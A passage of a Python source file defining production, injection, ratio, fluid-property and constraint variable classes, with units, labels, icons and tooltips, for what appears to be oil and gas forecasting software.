        self._line_options = LineOptions(label=r'Lift Gas Rate', colour=np.array([219., 34., 211.]) / 255.)
        self._plot_label = r'Lift Gas Injection Rate'
        self._id = 'lift_gas_rate'
class GasInjectionRate(RateVariable):
    """Gas injection rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Gas injection rate'
        self._image = ico.gas_injection_rate_16x16
        self._line_options = LineOptions(label=r'Gas Inj. Rate', colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Gas Injection Rate'
        self._id = 'gas_injection_rate'
class WaterInjectionRate(RateVariable):
    """Water injection rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Water injection rate'
        self._image = ico.water_injection_rate_16x16
        self._line_options = LineOptions(label=r'Water Inj. Rate', colour=np.array([91., 155., 213.]) / 255.)
        self._plot_label = r'Water Injection Rate'
        self._id = 'water_injection_rate'
class TotalGasRate(RateVariable):
    """Total gas (produced + lift) production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Total gas production rate'
        self._image = ico.total_gas_rate_16x16
        self._line_options = LineOptions(label=r'Total Gas Rate', colour=np.array([218., 119., 6.]) / 255.)
        self._plot_label = r'Total Gas Production Rate'
        self._id = 'total_gas_rate'
# ======================================================================================================================
# Cumulative Production Variables
# ======================================================================================================================
class CumulativeVariable(Variable):
    """Base class for cumulative production/injection variables (non-negative, type 'cumulatives')."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'cumulatives'
        self._type_id = ID_CUMULATIVE
class OilCumulative(CumulativeVariable):
    """Cumulative oil production."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._menu_label = 'Cumulative oil production'
        self._image = ico.oil_cum_16x16
        self._line_options = LineOptions(label=r'Oil Cum.', colour=np.array([0., 134., 61.]) / 255.)
        self._plot_label = r'Cumulative Oil Production'
        self._id = 'oil_cumulative'
class GasCumulative(CumulativeVariable):
    """Cumulative gas production."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasVolumeUnit(unit_system)
        self._menu_label = 'Cumulative gas production'
        self._image = ico.gas_cum_16x16
        self._line_options = LineOptions(label=r'Gas Cum.', colour=np.array([192., 0., 0.]) / 255.)
        self._plot_label = r'Cumulative Gas Production'
        self._id = 'gas_cumulative'
class WaterCumulative(CumulativeVariable):
    """Cumulative water production."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._menu_label = 'Cumulative water production'
        self._image = ico.water_cum_16x16
        self._line_options = LineOptions(label=r'Water Cum.', colour=np.array([51., 126., 195.]) / 255.)
        self._plot_label = r'Cumulative Water Production'
        self._id = 'water_cumulative'
class LiquidCumulative(CumulativeVariable):
    """Cumulative liquid production."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._menu_label = 'Cumulative liquid production'
        self._image = ico.liquid_cum_16x16
        self._line_options = LineOptions(label=r'Liquid Cum.', colour=np.array([51., 63., 79.]) / 255.)
        self._plot_label = r'Cumulative Liquid Production'
        self._id = 'liquid_cumulative'
class LiftGasCumulative(CumulativeVariable):
    """Cumulative lift gas injection."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = GasVolumeUnit(unit_system)
        self._menu_label = 'Cumulative lift gas injection'
        self._image = ico.lift_gas_cum_16x16
        self._line_options = LineOptions(label=r'Lift Gas Cum.', colour=np.array([153., 0., 153.]) / 255.)
        self._plot_label = r'Cumulative Lift Gas Injection'
        self._id = 'lift_gas_cumulative'
class GasInjectionCumulative(CumulativeVariable):
    """Cumulative gas injection."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = GasVolumeUnit(unit_system)
        self._menu_label = 'Cumulative gas injection'
        self._image = ico.gas_injection_cum_16x16
        self._line_options = LineOptions(label=r'Gas Inj. Cum.', colour=np.array([192., 0., 0.]) / 255.)
        self._plot_label = r'Cumulative Gas Injection'
        self._id = 'gas_injection_cumulative'
class WaterInjectionCumulative(CumulativeVariable):
    """Cumulative water injection."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._menu_label = 'Cumulative Water injection'
        self._image = ico.water_injection_cum_16x16
        self._line_options = LineOptions(label=r'Water Inj. Cum.', colour=np.array([51., 126., 195.]) / 255.)
        self._plot_label = r'Cumulative Water Injection'
        self._id = 'water_injection_cumulative'
class TotalGasCumulative(CumulativeVariable):
    """Cumulative total gas (produced + lift) production."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = GasVolumeUnit(unit_system)
        self._menu_label = 'Cumulative total gas production'
        self._image = ico.total_gas_cum_16x16
        self._line_options = LineOptions(label=r'Total Gas Cum.', colour=np.array([218., 119., 6.]) / 255.)
        self._plot_label = r'Cumulative Total Gas Production'
        self._id = 'total_gas_cumulative'
# ======================================================================================================================
# Ratio Variables
# ======================================================================================================================
class FractionVariable(Variable):
    """Base class for ratio variables bounded to [0, 1] (type 'ratios')."""
    def __init__(self):
        super().__init__()
        self._limits = (0., 1.)
        self._type = 'ratios'
        self._type_id = ID_RATIO
class RatioVariable(Variable):
    """Base class for unbounded, non-negative ratio variables (type 'ratios')."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'ratios'
        self._type_id = ID_RATIO
class WaterCut(FractionVariable):
    """Water-cut: water rate as a fraction of liquid rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidLiquidRatioUnit(unit_system)
        self._menu_label = 'Water-cut'
        self._image = ico.water_cut_16x16
        self._line_options = LineOptions(label=r'Water-cut', colour=np.array([91., 155., 213.]) / 255.)
        self._fitted_options = FittedDataOptions(colour=np.array([217., 83., 25.]) / 255.)  # TODO: NOT USED
        self._plot_label = r'Water-cut'
        self._id = 'water_cut'
class OilCut(FractionVariable):
    """Oil-cut: oil rate as a fraction of liquid rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidLiquidRatioUnit(unit_system)
        self._menu_label = 'Oil-cut'
        self._image = ico.oil_cut_16x16
        self._line_options = LineOptions(label=r'Oil-cut', colour=np.array([0., 176., 80.]) / 255.)
        self._fitted_options = FittedDataOptions(colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Oil-cut'
        self._id = 'oil_cut'
class GasOilRatio(RatioVariable):
    """Gas-oil ratio (GOR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._menu_label = 'Gas-oil ratio'
        self._image = ico.gas_oil_ratio_16x16
        self._line_options = LineOptions(label=r'GOR', colour=np.array([255., 0., 0.]) / 255.)
        self._fitted_options = FittedDataOptions(colour=np.array([122., 48., 160.]) / 255.)
        self._plot_label = r'Gas-Oil Ratio'
        self._id = 'gas_oil_ratio'
class WaterOilRatio(RatioVariable):
    """Water-oil ratio (WOR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidLiquidRatioUnit(unit_system)
        self._menu_label = 'Water-oil ratio'
        self._image = ico.water_oil_ratio_16x16
        self._line_options = LineOptions(label=r'WOR', colour=np.array([91., 155., 213.]) / 255.)
        self._plot_label = r'Water-Oil Ratio'
        self._id = 'water_oil_ratio'
class GasLiquidRatio(RatioVariable):
    """Gas-liquid ratio (GLR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._menu_label = 'Gas-liquid ratio'
        self._image = ico.gas_liquid_ratio_16x16
        self._line_options = LineOptions(label=r'GLR', colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Gas-Liquid Ratio'
        self._id = 'gas_liquid_ratio'
class WaterGasRatio(RatioVariable):
    """Water-gas ratio (WGR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidGasRatioUnit(unit_system)
        self._menu_label = 'Water-gas ratio'
        self._image = ico.water_gas_ratio_16x16
        self._line_options = LineOptions(label=r'WGR', colour=np.array([91., 155., 213.]) / 255.)
        self._plot_label = r'Water-Gas Ratio'
        self._id = 'water_gas_ratio'
class OilGasRatio(RatioVariable):
    """Oil-gas ratio."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidGasRatioUnit(unit_system)
        self._menu_label = 'Oil-gas ratio'
        self._image = ico.oil_gas_ratio_16x16
        # NOTE(review): label r'WGR' looks copy-pasted from WaterGasRatio; 'OGR' expected — confirm before changing
        self._line_options = LineOptions(label=r'WGR', colour=np.array([0., 176., 80.]) / 255.)
        self._plot_label = r'Oil-Gas Ratio'
        self._id = 'oil_gas_ratio'
class TotalGasLiquidRatio(RatioVariable):
    """Total gas-liquid ratio (TGLR), including lift gas."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._menu_label = 'Total gas-liquid ratio'
        self._image = ico.total_gas_liquid_ratio_16x16
        self._line_options = LineOptions(label=r'TGLR', colour=np.array([218., 119., 6.]) / 255.)
        self._plot_label = r'Total Gas-Liquid Ratio'
        self._id = 'total_gas_liquid_ratio'
# ======================================================================================================================
# Uptime Variables
# ======================================================================================================================
class UptimeVariable(Variable):
    """Base class for uptime fraction variables, bounded to [0, 1] (type 'uptimes')."""
    def __init__(self):
        super().__init__()
        self._limits = (0., 1.)
        self._type = 'uptimes'
        self._type_id = ID_UPTIME
class ProductionUptime(UptimeVariable):
    """Fraction of time the producer is on stream."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._menu_label = 'Production uptime'
        self._image = ico.uptime_16x16
        self._line_options = LineOptions(label=r'Prod. uptime', colour=np.array([255., 217., 102.]) / 255.)
        self._plot_label = r'Production Uptime'
        self._id = 'production_uptime'
class LiftGasUptime(UptimeVariable):
    """Fraction of time lift gas injection is active."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._menu_label = 'Lift gas uptime'
        self._image = ico.uptime_16x16
        self._line_options = LineOptions(label=r'Lift gas uptime', colour=np.array([255., 217., 102.]) / 255.)
        self._plot_label = r'Lift Gas Uptime'
        self._id = 'lift_gas_uptime'
class GasInjectionUptime(UptimeVariable):
    """Fraction of time gas injection is active."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._menu_label = 'Gas inj. uptime'
        self._image = ico.uptime_16x16
        self._line_options = LineOptions(label=r'Gas inj. uptime', colour=np.array([255., 217., 102.]) / 255.)
        self._plot_label = r'Gas Injection Uptime'
        self._id = 'gas_injection_uptime'
class WaterInjectionUptime(UptimeVariable):
    """Fraction of time water injection is active."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._menu_label = 'Water inj. uptime'
        self._image = ico.uptime_16x16
        self._line_options = LineOptions(label=r'Water inj. uptime', colour=np.array([255., 217., 102.]) / 255.)
        self._plot_label = r'Water Injection Uptime'
        self._id = 'water_injection_uptime'
# ======================================================================================================================
# Summary variables (for use on frames)
# ======================================================================================================================
class SummaryFunction(Variable):
    """Frame control: how a temporal profile is reduced to a single scalar."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Function'
        self._choices = ('Point', 'Sum', 'Average')
        # NOTE(review): all three choices share the same icon — possibly placeholders; confirm intent
        self._choice_images = (ico.specific_point_16x16, ico.specific_point_16x16, ico.specific_point_16x16)
        self._pytype = tuple
        self._tooltip = 'Function that reduces a temporal production profile to a scalar.'
class SummaryPoint(Variable):
    """Frame control: which point of the profile the summary is taken at."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Point'
        self._choices = ('First', 'Last', 'Date', 'Time')
        self._choice_images = (ico.first_point_16x16, ico.last_point_16x16, ico.dates_16x16, ico.time_16x16)
        self._pytype = tuple
        self._tooltip = 'The specific summary point of the production profile.'
class SummaryPointDate(Variable):
    """Frame control: calendar date of the summary point."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Date'
        self._pytype = date
        self._tooltip = 'Date at which to extract summary point.'
class SummaryPointTime(Variable):
    """Frame control: elapsed time (years) of the summary point."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = 'years'
        self._frame_label = 'Time'
        self._pytype = float
        self._tooltip = 'Time at which to extract summary point.'
class SummaryIcon(Variable):
    """Frame control: icon choice for a summary; maps combobox index to bitmap."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Icon'
        self._choices = ('Oil rate', 'Gas rate', 'Water rate', 'Liquid rate', 'Lift gas rate', 'Gas injection rate',
                         'Water injection rate', 'Total gas rate', 'Oil cumulative', 'Gas cumulative',
                         'Water cumulative', 'Liquid cumulative', 'Lift gas cumulative', 'Gas injection cumulative',
                         'Water injection cumulative', 'Total gas cumulative', 'Length', 'HCFT', 'HCPV', 'Permeability')
        self._choice_images = (ico.oil_rate_16x16, ico.gas_rate_16x16, ico.water_rate_16x16,
                               ico.liquid_rate_16x16, ico.lift_gas_rate_16x16, ico.gas_injection_rate_16x16,
                               ico.water_injection_rate_16x16, ico.total_gas_rate_16x16,
                               ico.oil_cum_16x16, ico.gas_cum_16x16, ico.water_cum_16x16,
                               ico.liquid_cum_16x16, ico.lift_gas_cum_16x16, ico.gas_injection_cum_16x16,
                               ico.water_injection_cum_16x16, ico.total_gas_cum_16x16,
                               ico.completion_16x16, ico.HCFT_16x16, ico.HCPV_16x16, ico.permeability_16x16)
        # combobox client data: index -> bitmap
        self._client_data_map = {i: bitmap for i, bitmap in enumerate(self._choice_images)}
        self._pytype = tuple
class HistogramFrequency(Variable):
    """Y-axis variable for histograms: non-negative frequency count."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = AmountUnit()
        self._plot_label = 'Frequency'
        self._legend = 'Frequency'
        self._limits = (0., None)
# ======================================================================================================================
# Concession Variables
# ======================================================================================================================
class License(Variable):
    """Concession license expiry date (type 'concessions')."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'License'
        self._pytype = date
        self._type = 'concessions'
        self._id = 'license'
# ======================================================================================================================
# Plateau Variables
# ======================================================================================================================
class PlateauVariable(Variable):
    """Base class for plateau-target variables (non-negative float, 1 decimal, type 'plateaus')."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._round_off = 1
        self._pytype = float
        self._type = 'plateaus'
class TargetOilPlateau(PlateauVariable):
    """Target oil plateau rate used as a prediction constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Target oil'
        self._menu_label = 'Target oil plateau'
        self._image = ico.well_spacing_16x16
        self._plot_label = r'Target Oil Plateau'
        self._legend = r'Oil Plateau'
        self._tooltip = 'Target oil plateau used as constraint in prediction.'
        self._id = 'target_oil_plateau'
class TargetGasPlateau(PlateauVariable):
    """Target gas plateau rate used as a prediction constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Target gas'
        self._menu_label = 'Target gas plateau'
        self._image = ico.well_spacing_16x16
        self._plot_label = r'Target Gas Plateau'
        self._legend = r'Gas Plateau'
        self._tooltip = 'Target gas plateau used as constraint in prediction.'
        self._id = 'target_gas_plateau'
# ======================================================================================================================
# Well Variables
# ======================================================================================================================
class ProductionPhase(Variable):
    """Frame control: primary produced phase (Oil or Gas)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Primary phase'
        self._choices = ('Oil', 'Gas')
        self._pytype = Index
class InjectionPhase(Variable):
    """Frame control: injected phase (Water, Gas or WAG)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Injected phase'
        self._choices = ('Water', 'Gas', 'WAG')
        self._pytype = Index
class DevelopmentLayout(Variable):
    """Frame control: well-pattern layout used when scaling well spacing."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Layout'
        self._image = ico.well_pair_2_16x16
        self._choices = (None, 'Line-drive', 'Radial', '5-spot')
        self._choice_images = (None, ico.well_pair_2_16x16, ico.radial_pattern_16x16, ico.five_spot_16x16)
        self._tooltip = 'Scaling of well spacing is only done on\n' \
                        'wells/analogues with similar development scheme.'
        self._pytype = tuple
class WellSpacing(Variable):
    """Well spacing; scales rate/cumulative production against an analogue."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LengthUnit(unit_system)
        self._frame_label = 'Spacing'
        self._menu_label = 'Well spacing'
        self._image = ico.well_spacing_16x16
        self._limits = (0., None)
        self._plot_label = r'Well Spacing'
        self._legend = r'Spacing'
        self._tooltip = 'Used to scale the rate and cumulative production\n' \
                        'based on the ratio between the spacing of the\n' \
                        'producer and an analogue.'
        self._pytype = int
        self._type = 'well_spacing'
        self._id = 'spacing'
class History(Variable):
    """Frame control: import of a historical data profile."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Import'
        self._pytype = tuple
        self._tooltip = 'Profile of historical data:\n' \
                        '- Browse: Import profile from external file.'
class HistoryFit(Variable):
    """Frame control: import of historical data with model fitting for prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Import'
        self._pytype = tuple
        self._tooltip = 'Profile of historical data:\n' \
                        '- Browse: Import profile from external file\n' \
                        '- Window: Fit models to historical data for use in prediction.'
class Cultural(Variable):
    """Frame control: import of cultural geometry (outline, trajectory or point) per entity type."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Import'
        self._pytype = tuple
        self._tooltip = 'Cultural of the entity:\n' \
                        '- Field, Block, Reservoir, Theme, Polygon: 2D outline (x, y)\n' \
                        '- Pipeline: 2D trajectory (x, y)\n' \
                        '- Platform, Processor: Point (x, y)\n' \
                        '- Producer, Injector, Analogue: 3D trajectory (x, y, z)'
class Prediction(Variable):
    """Frame control: prediction case selector (Low/Mid/High)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Prediction'
        self._choices = ('Low', 'Mid', 'High')
        self._choice_images = (ico.low_chart_16x16, ico.mid_chart_16x16, ico.high_chart_16x16)
        self._pytype = tuple
class ProbabilityOfOccurrence(Variable):
    """Sampling probability (percent) of the selected prediction in uncertainty modelling."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = PercentageUnit()
        self._frame_label = 'Occurrence'
        self._limits = (0., 100.)
        self._round_off = 1
        self._pytype = float
        self._tooltip = 'Probability of the currently selected prediction\n' \
                        'to be sampled during uncertainty modelling'
# ======================================================================================================================
# Pointer Variables
# ======================================================================================================================
class Analogue(Variable):
    """Pointer to an analogue entity supplying historical data."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Analogue'
        self._pytype = Pointer
        # NOTE(review): tooltip first line reads 'from which to historical data' — a verb
        # ('gather'/'import'?) appears to be missing; confirm intended wording before changing
        self._tooltip = 'Analogue from which to historical data:\n' \
                        '- Arrow: Insert Analogue from menu\n' \
                        '- Window: Create function based on models\n' \
                        '  fitted to historical data.'
class Typecurve(Variable):
    """Pointer to a typecurve profile used for prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Typecurve'
        self._pytype = Pointer
        self._tooltip = 'Profile used for prediction:\n' \
                        '- Arrow: Insert Typecurve from menu\n' \
                        '- Browse: Import profile from external file\n' \
                        '- Window: Create function based on models\n' \
                        '  fitted to historical data.'
class Scaling(Variable):
    """Pointer to a scaling evaluation (static parameters -> scalers)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Scaling'
        self._pytype = Pointer
        self._tooltip = 'Scaling evaluation used for transforming\n' \
                        'static parameters to scalers:\n' \
                        '- Arrow: Insert Scaling from menu.'
class Scenario(Variable):
    """Pointer to a scenario providing entities, events and dates."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Scenario'
        self._pytype = Pointer
        self._tooltip = 'Scenario from which to gather entities, events and dates:\n' \
                        '- Arrow: Insert Scenario from menu.'
class HistorySimulation(Variable):
    """Pointer to a history simulation carried into prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'History'
        self._pytype = Pointer
        self._tooltip = 'History simulation to carry into prediction:\n' \
                        '- Arrow: Insert History from menu.'
# ======================================================================================================================
# Fluid Variables
# ======================================================================================================================
class FluidVariable(Variable):
    """Base for fluid (PVT) properties: non-negative float rounded to 2 decimals."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._round_off = 2
        self._pytype = float
class ReservoirFluidVariable(FluidVariable):
    """Fluid property belonging to the reservoir-fluids group."""
    def __init__(self):
        super().__init__()
        self._type = 'res_fluids'
class InjectionFluidVariable(FluidVariable):
    """Fluid property belonging to the injection-fluids group."""
    def __init__(self):
        super().__init__()
        self._type = 'inj_fluids'
class OilFVF(ReservoirFluidVariable):
    """Oil formation volume factor, Bo."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeRatio(unit_system)
        self._frame_label = 'Bo'
        self._menu_label = 'Oil FVF'
        self._image = ico.Bo_16x16
        self._plot_label = r'Oil FVF, $b_o$'
        self._legend = r'$b_o$'
        self._tooltip = 'Oil formation volume factor.'
        self._id = 'bo'
class GasFVF(ReservoirFluidVariable):
    """Gas formation volume factor, Bg."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasVolumeRatio(unit_system)
        self._frame_label = 'Bg'
        self._menu_label = 'Gas FVF'
        self._image = ico.Bg_16x16
        self._plot_label = r'Gas FVF, $b_g$'
        self._legend = r'$b_g$'
        self._tooltip = 'Gas formation volume factor.'
        self._id = 'bg'
class WaterFVF(ReservoirFluidVariable):
    """Water formation volume factor, Bw."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeRatio(unit_system)
        self._frame_label = 'Bw'
        self._menu_label = 'Water FVF'
        self._image = ico.Bw_16x16
        self._plot_label = r'Water FVF, $b_w$'
        self._legend = r'$b_w$'
        self._tooltip = 'Water formation volume factor.'
        self._id = 'bw'
class SolutionGasOilRatio(ReservoirFluidVariable):
    """Solution gas-oil ratio, Rs."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._frame_label = 'Rs'
        self._menu_label = 'Solution GOR'
        self._image = ico.Rs_16x16
        self._plot_label = r'Solution Gas-Oil Ratio, $R_s$'
        self._legend = r'$R_s$'
        self._tooltip = 'Solution gas-oil-ratio.'
        self._id = 'rs'
class InjectionGasFVF(InjectionFluidVariable):
    """Injection-gas formation volume factor."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasVolumeRatio(unit_system)
        self._frame_label = 'Bg inj.'
        self._menu_label = 'Gas inj. FVF'
        self._image = ico.Bg_inj_16x16
        self._plot_label = r'Injection Gas FVF, $b_{g,inj}$'
        self._legend = r'$b_{g,inj}$'
        self._tooltip = 'Injection gas formation volume factor.'
        self._id = 'bg_inj'
class InjectionWaterFVF(InjectionFluidVariable):
    """Injection-water formation volume factor."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeRatio(unit_system)
        self._frame_label = 'Bw inj.'
        self._menu_label = 'Water inj. FVF'
        self._image = ico.Bw_inj_16x16
        self._plot_label = r'Injection Water FVF, $b_{w,inj}$'
        self._legend = r'$b_{w,inj}$'
        self._tooltip = 'Injection water formation volume factor.'
        self._id = 'bw_inj'
# ======================================================================================================================
# Stakes Variables
# ======================================================================================================================
class Maturity(Variable):
    """Maturity index in [0.5, 1.5]; low values indicate low maturity."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Maturity'
        self._menu_label = 'Maturity'
        self._image = ico.oil_cum_16x16  # TODO: Draw icon
        self._limits = (.5, 1.5)
        self._plot_label = r'Maturity'
        self._legend = r'Maturity'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Maturity index between 0.5 to 1.5,\n' \
                        'low values indicate low maturity and vice versa.'
        self._type = 'risking'
        self._id = 'maturity'
class ProbabilityOfSuccess(Variable):
    """PoS (0-100 %) used to include/exclude a well during uncertainty modelling."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = PercentageUnit()
        self._frame_label = 'PoS'
        self._menu_label = 'Probability of success'
        self._image = ico.binary_distribution_16x16
        self._limits = (0., 100.)
        self._plot_label = r'Probability of Success, PoS'
        self._legend = r'PoS'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Probability of Success is used to include or\n' \
                        'exclude a well during uncertainty modelling.\n' \
                        'Weighted average shown for subsurface items.'
        self._type = 'risking'
        self._id = 'pos'
class STOIIP(Variable):
    """Stock-tank oil initially in place (non-negative integer volume)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._frame_label = 'STOIIP'
        self._menu_label = 'STOIIP'
        self._image = ico.stoiip_16x16
        self._limits = (0., None)
        self._plot_label = r'STOIIP'
        self._legend = r'STOIIP'
        self._pytype = int
        self._tooltip = 'Stock tank oil initially in place.'
        self._type = 'volumes'
        self._id = 'stoiip'
# ======================================================================================================================
# Constraint Variables
# ======================================================================================================================
class ConstraintVariable(Variable):
    """Base for flow-constraint variables: non-negative float, 2 decimals."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._round_off = 2
        self._pytype = float
        self._type = 'constraints'
class OilConstraint(ConstraintVariable):
    """Maximum oil flow-rate constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Oil flow'
        self._menu_label = 'Oil flow con.'
        self._image = ico.oil_flow_constraint_16x16
        self._plot_label = r'Oil Flow Constraint, $Q_{o,max}$'
        self._legend = r'Oil Con.'
        self._tooltip = 'Oil flow constraint.'
        self._id = 'oil_constraint'
class GasConstraint(ConstraintVariable):
    """Maximum gas flow-rate constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Gas flow'
        self._menu_label = 'Gas flow con.'
        self._image = ico.gas_flow_constraint_16x16
        self._plot_label = r'Gas Flow Constraint, $Q_{g,max}$'
        self._legend = r'Gas Con.'
        self._tooltip = 'Gas flow constraint.'
        self._id = 'gas_constraint'
class WaterConstraint(ConstraintVariable):
    """Maximum water flow-rate constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Water flow'
        self._menu_label = 'Water flow con.'
        self._image = ico.water_flow_constraint_16x16
        self._plot_label = r'Water Flow Constraint, $Q_{w,max}$'
        self._legend = r'Water Con.'
        self._tooltip = 'Water flow constraint.'
        self._id = 'water_constraint'
class LiquidConstraint(ConstraintVariable):
    """Maximum liquid flow-rate constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Liquid flow'
        # Fix: capitalised to match the sibling menu labels
        # ('Oil flow con.', 'Gas flow con.', 'Water flow con.').
        self._menu_label = 'Liquid flow con.'
        self._image = ico.liquid_flow_constraint_16x16
        self._plot_label = r'Liquid Flow Constraint, $Q_{l,max}$'
        self._legend = r'Liquid Con.'
        self._tooltip = 'Liquid flow constraint.'
        self._id = 'liquid_constraint'
class InjectionGasConstraint(ConstraintVariable):
    """Maximum gas-injection rate constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Gas-inj. rate'
        self._menu_label = 'Gas-inj. con.'
        self._image = ico.gas_injection_constraint_16x16
        self._plot_label = r'Gas-Injection Constraint, $Q_{g,inj,max}$'
        self._legend = r'Gas-Inj. Con.'
        self._tooltip = 'Injection gas constraint.'
        self._id = 'gas_inj_constraint'
class InjectionWaterConstraint(ConstraintVariable):
    """Maximum water-injection rate constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Water-inj. rate'
        self._menu_label = 'Water-inj. con.'
        self._image = ico.water_injection_constraint_16x16
        self._plot_label = r'Water-Injection Constraint, $Q_{w,inj,max}$'
        self._legend = r'Water-Inj. Con.'
        self._tooltip = 'Injection water constraint.'
        self._id = 'water_inj_constraint'
class LiftGasConstraint(ConstraintVariable):
    """Maximum lift-gas rate constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Gas-lift rate'
        self._menu_label = 'Gas-lift con.'
        self._image = ico.lift_gas_constraint_16x16
        self._plot_label = r'Gas-Lift Constraint, $Q_{g,lift,max}$'
        self._legend = r'Gas-Lift Con.'
        self._tooltip = 'Lift-gas constraint.'
        self._id = 'lift_gas_constraint'
# ======================================================================================================================
# Out-flowing Phase Variables
# ======================================================================================================================
class OilInflow(Variable):
    """Boolean flag: oil is fed in from the previous node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Oil'
        self._pytype = bool
        self._tooltip = 'Oil is fed in from the previous node.'
class GasInflow(Variable):
    """Boolean flag: total gas (reservoir + lift) is fed in from the previous node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Gas'
        self._pytype = bool
        self._tooltip = 'Gas is fed in from the previous node.\n' \
                        'This is the total gas, i.e. gas from\n' \
                        'the reservoir and lift-gas.'
class WaterInflow(Variable):
    """Boolean flag: water is fed in from the previous node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Water'
        self._pytype = bool
        self._tooltip = 'Water is fed in from the previous node.'
class InjectionGasInflow(Variable):
    """Boolean flag: injection gas is fed in from the previous node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Injection Gas'
        self._pytype = bool
